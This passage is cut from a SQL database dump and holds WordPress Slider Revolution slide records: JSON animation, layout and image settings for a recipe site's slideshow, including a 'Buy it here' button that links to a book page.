From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1340,\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"http:\\/\\/succulents.select-themes.com\\/summer-booze\\/\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"jump_to_slide\":\"\",\"scrollunder_offset\":\"\",\"action_easing\":\"none\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(27,15,1,'{\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','','{\"version\":\"6.6.0\"}'),(28,15,2,'{\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','','{\"version\":\"6.6.0\"}'),(30,16,5,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/drink-gren-1943x1300-1.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":30,\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),(31,16,2,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/orange-tea-1943-x-1300.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":31,\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),(32,16,6,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/recipe-website.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":32,\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),(33,16,1,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/orange-banana-ready-1300-x-1945.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":33,\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),(34,16,3,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/fish-1300x1943-1.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":34,\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),(35,16,7,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/carrot-1943-x1300.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":35,\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),(37,16,4,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/Icecream-pineapplefw.jpg\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"uid\":37,\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),(38,17,1,'{\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','','{\"version\":\"6.6.0\"}'),(39,17,2,'{\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','','{\"version\":\"6.6.0\"}'),(40,18,1,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/slideshow_1_2048x2048.jpg\",\"imageId\":5245,\"imageLib\":\"medialibrary\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"3\":{\"text\":\"\",\"alias\":\"Image-3\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/long-advert-book-NW.jpg\",\"imageId\":5245,\"loaded\":true,\"imageLib\":\"medialibrary\"},\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"1359px\",\"e\":true},\"n\":{\"v\":\"1122px\"},\"t\":{\"v\":\"852px\"},\"m\":{\"v\":\"525px\"}},\"height\":{\"d\":{\"v\":\"453px\",\"e\":true},\"n\":{\"v\":\"374px\"},\"t\":{\"v\":\"284px\"},\"m\":{\"v\":\"175px\"}},\"originalWidth\":1200,\"originalHeight\":400,\"aspectRatio\":{\"d\":{\"v\":3},\"n\":{\"v\":3},\"t\":{\"v\":3},\"m\":{\"v\":3}},\"scaleProportional\":true,\"originalSize\":true},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-1px\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"group\":{\"groupOrder\":7},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":9000,\"endWithSlide\":true,\"frameLength\":300}}},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"16\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"n\":{\"v\":\"20\"},\"t\":{\"v\":\"15\"},\"m\":{\"v\":\"9\"}},\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[]},\"type\":\"image\",\"version\":\"6.6.0\"},\"11\":{\"text\":\"Buy it here\",\"alias\":\"Button-11\",\"uid\":11,\"toggle\":{\"text\":\"\"},\"size\":{\"minWidth\":{\"d\":{\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"0px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"967px\",\"e\":true},\"n\":{\"v\":\"798px\"},\"t\":{\"v\":\"606px\"},\"m\":{\"v\":\"373px\"}},\"y\":{\"d\":{\"v\":\"296px\",\"e\":true},\"n\":{\"v\":\"244px\"},\"t\":{\"v\":\"185px\"},\"m\":{\"v\":\"114px\"}},\"zIndex\":10,\"position\":\"absolute\"},\"group\":{\"groupOrder\":10},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":9000,\"endWithSlide\":true,\"frameLength\":300}}},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,20,0,20],\"e\":false},\"n\":{\"v\":[0,17,0,17],\"e\":false},\"t\":{\"v\":[0,13,0,13],\"e\":false},\"m\":{\"v\":[0,8,0,8],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"16\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"fontWeight\":{\"d\":{\"v\":\"500\"},\"n\":{\"v\":\"500\"},\"t\":{\"v\":\"500\"},\"m\":{\"v\":\"500\"}},\"lineHeight\":{\"d\":{\"v\":\"50\"},\"n\":{\"v\":\"41\"},\"t\":{\"v\":\"31\"},\"m\":{\"v\":\"19\"}},\"backgroundColor\":\"#494649\",\"borderRadius\":{\"v\":[\"25px\",\"25px\",\"25px\",\"25px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"usehover\":true,\"color\":\"rgba(0,0,0,1)\",\"backgroundColor\":\"#ffffff\",\"borderRadius\":{\"v\":[\"25px\",\"25px\",\"25px\",\"25px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"speed\":200,\"ease\":\"power1.inOut\"},\"actions\":{\"action\":[{\"action\":\"link\",\"tooltip_event\":\"click\",\"link_help_in\":\"keep\",\"link_open_in\":\"_self\",\"link_follow\":\"nofollow\",\"link_type\":\"a\",\"image_link\":\"http:\\/\\/tummyrevolution.com\\/buy-book\\/\"}]},\"runtime\":{\"internalClass\":\"rev-btn\"},\"type\":\"button\",\"version\":\"6.6.0\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),(41,18,2,'{\"runtime\":{\"collapsedGroups\":[]},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"4\":{\"text\":\"\",\"alias\":\"Image-4\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/long-advert-text-NW.jpg\",\"imageId\":5246,\"loaded\":true,\"imageLib\":\"medialibrary\"},\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"1380px\",\"e\":true},\"n\":{\"v\":\"1139px\"},\"t\":{\"v\":\"865px\"},\"m\":{\"v\":\"533px\"}},\"height\":{\"d\":{\"v\":\"460px\",\"e\":true},\"n\":{\"v\":\"379px\"},\"t\":{\"v\":\"287px\"},\"m\":{\"v\":\"177px\"}},\"originalWidth\":1200,\"originalHeight\":400,\"aspectRatio\":{\"d\":{\"v\":3},\"n\":{\"v\":3},\"t\":{\"v\":3},\"m\":{\"v\":3}},\"scaleProportional\":true,\"originalSize\":true},\"position\":{\"x\":{\"d\":{\"v\":\"-69px\",\"e\":true},\"n\":{\"v\":\"-56px\"},\"t\":{\"v\":\"-42px\"},\"m\":{\"v\":\"-25px\"}},\"y\":{\"d\":{\"v\":\"-9px\",\"e\":true},\"n\":{\"v\":\"-7px\"},\"t\":{\"v\":\"-5px\"},\"m\":{\"v\":\"-3px\"}},\"zIndex\":5,\"position\":\"absolute\"},\"group\":{\"groupOrder\":5},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":9000,\"endWithSlide\":true,\"frameLength\":300}}},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"16\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"n\":{\"v\":\"20\"},\"t\":{\"v\":\"15\"},\"m\":{\"v\":\"9\"}},\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[]},\"type\":\"image\",\"version\":\"6.6.0\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM 